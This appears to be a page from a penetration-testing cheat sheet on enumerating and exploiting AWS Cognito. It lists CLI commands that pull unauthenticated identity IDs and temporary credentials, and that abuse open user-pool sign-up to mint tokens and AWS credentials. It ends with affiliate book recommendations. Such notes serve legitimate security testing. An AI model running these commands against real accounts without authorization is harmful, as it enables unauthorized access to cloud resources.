Cognito

Cognito Enumeration and Exploitation

Cognito allows developers an easy way to add user sign-up, sign-in, and access controls to mobile and web application within minutes. Provides tenant-based identity stores and federation options that can indefinitely scale.

Get Identity ID Value

aws cognito-identity get-id --identity-pool-id <identity-pool-id> --no-sign --region <region>

Get credentials for Cognito Identity ID

aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Exploit User Pool Identity Provider

aws cognito-idp sign-up --client-id <client id> --username <username> --password 'Password123!' --region <region>

aws cognito-idp sign-up --client-id <client id> --username <new user> --password <password> --user-attributes Name="email",Value="<email>" Name="name",Value="<new user>" --region <region>

aws cognito-idp confirm-sign-up --client-id <client id> --username <username> --confirmation-code <code> --region <region>

aws cognito-identity get-id --identity-pool-id "<identity pool id>" --logins "{ \"<User Pool Identifier from JSON ID Token>\": \"<ID Token>\" }" --region <region>

aws cognito-identity get-credentials-for-identity --identity-id <identity id> --logins "{ \"<User Pool Identifier from JSON ID Token>\": \"<token>\" }" --region <region>

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Advanced Penetration Testing: Hacking AWS 2 This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment
• Hands-On AWS Penetration Testing with Kali Linux Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud